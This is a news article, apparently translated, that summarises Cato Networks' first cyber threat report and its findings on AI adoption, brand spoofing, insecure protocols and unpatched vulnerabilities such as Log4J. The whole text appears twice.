The Cato Networks report covers all the dangers and nuances.
Cato Networks has released its first report on the analysis of cyber threats to corporate networks and enterprise IT infrastructure. The document was prepared using the capabilities of the SASE (Secure Access Service Edge) architecture developed by Cato Networks.
SASE combines network and security services into a single cloud platform for secure access. According to Cato, threats are usually analyzed in isolation, by separate systems. However, SASE allows you to conduct a comprehensive assessment of external data, incoming and outgoing traffic, and network activity, giving a holistic view of the organization's security status.
The report is based on a huge amount of data collected from more than 2,200 Cato customers worldwide - 1.26 trillion network streams and 21.45 billion repelled attacks. The analysis of information was carried out using proprietary algorithms of artificial intelligence and machine learning Cato, hundreds of sources of data on cyber threats, as well as due to the expertise of a whole team of specialists-former military analysts and scientists.
Applying the generally accepted MITRE ATT&CK framework, the report comprehensively covers all threats from a strategic, tactical, and operational perspective, including malicious and suspicious activity, as well as applications, protocols, and tools used in corporate networks.
Key findings of the report include:
1. Enterprises are actively implementing artificial intelligence tools, such as Microsoft Copilot, ChatGPT from OpenAI, and the Emol app for communicating with emotional AI assistants.
2. The hacker community is actively discussing the use of artificial intelligence technologies to improve malware. For example, it is supposed to help improve the efficiency of the SQLMap tool in finding and exploiting vulnerabilities. In addition, hackers offer their colleagues services for generating fake credentials and creating deepfakes. We are also recruiting specialists to develop a malicious version of ChatGPT.
3. Well-known brands, such as Booking, Amazon, and eBay, are actively exploited by hackers for fraud and other illegal purposes using spoofing methods.
4. Unprotected protocols such as HTTP (62% of web traffic), Telnet (54%), and SMBv1/v2 (46%) are still widely used in corporate networks, which allows attackers to move freely around the network.
5. The main threat to enterprises is not 0-day vulnerabilities, but outdated unclosed problems. In particular, the Log4J vulnerabilities (CVE-2021-44228) remain among the most actively exploited.
6. The vectors of cyber attacks vary significantly depending on the industry of the enterprise. For example, the entertainment, telecommunications and mining industries are characterized by DoS (denial of service) attacks, and in the service and hotel industries-active exploitation of vulnerabilities to steal credentials.
7. When analyzing threats, context is extremely important, since seemingly harmless activity can actually indicate malicious actions. Their timely detection requires a comprehensive understanding of network traffic patterns combined with the use of artificial intelligence and machine learning technologies.
8. Despite the critical role of DNS for enterprise operations, only 1% of organizations use Secure DNS (DNSSEC). The reasons for its "unpopularity" are still unclear.
To get the most up-to-date and comprehensive information about threats, trends in cybersecurity, the activities of hacker communities, and ways to counter them, Cato recommends reading the full text of the cyberthreat report for SASE.
Cato Networks has released its first report on the analysis of cyber threats to corporate networks and enterprise IT infrastructure. The document was prepared using the capabilities of the SASE (Secure Access Service Edge) architecture developed by Cato Networks.
SASE combines network and security services into a single cloud platform for secure access. According to Cato, threats are usually analyzed in isolation, by separate systems. However, SASE allows you to conduct a comprehensive assessment of external data, incoming and outgoing traffic, and network activity, giving a holistic view of the organization's security status.
The report is based on a huge amount of data collected from more than 2,200 Cato customers worldwide - 1.26 trillion network streams and 21.45 billion repelled attacks. The analysis of information was carried out using proprietary algorithms of artificial intelligence and machine learning Cato, hundreds of sources of data on cyber threats, as well as due to the expertise of a whole team of specialists-former military analysts and scientists.
Applying the generally accepted MITRE ATT&CK framework, the report comprehensively covers all threats from a strategic, tactical, and operational perspective, including malicious and suspicious activity, as well as applications, protocols, and tools used in corporate networks.
Key findings of the report include:
1. Enterprises are actively implementing artificial intelligence tools, such as Microsoft Copilot, ChatGPT from OpenAI, and the Emol app for communicating with emotional AI assistants.
2. The hacker community is actively discussing the use of artificial intelligence technologies to improve malware. For example, it is supposed to help improve the efficiency of the SQLMap tool in finding and exploiting vulnerabilities. In addition, hackers offer their colleagues services for generating fake credentials and creating deepfakes. We are also recruiting specialists to develop a malicious version of ChatGPT.
3. Well-known brands, such as Booking, Amazon, and eBay, are actively exploited by hackers for fraud and other illegal purposes using spoofing methods.
4. Unprotected protocols such as HTTP (62% of web traffic), Telnet (54%), and SMBv1/v2 (46%) are still widely used in corporate networks, which allows attackers to move freely around the network.
5. The main threat to enterprises is not 0-day vulnerabilities, but outdated unclosed problems. In particular, the Log4J vulnerabilities (CVE-2021-44228) remain among the most actively exploited.
6. The vectors of cyber attacks vary significantly depending on the industry of the enterprise. For example, the entertainment, telecommunications and mining industries are characterized by DoS (denial of service) attacks, and in the service and hotel industries-active exploitation of vulnerabilities to steal credentials.
7. When analyzing threats, context is extremely important, since seemingly harmless activity can actually indicate malicious actions. Their timely detection requires a comprehensive understanding of network traffic patterns combined with the use of artificial intelligence and machine learning technologies.
8. Despite the critical role of DNS for enterprise operations, only 1% of organizations use Secure DNS (DNSSEC). The reasons for its "unpopularity" are still unclear.
To get the most up-to-date and comprehensive information about threats, trends in cybersecurity, the activities of hacker communities, and ways to counter them, Cato recommends reading the full text of the cyberthreat report for SASE.
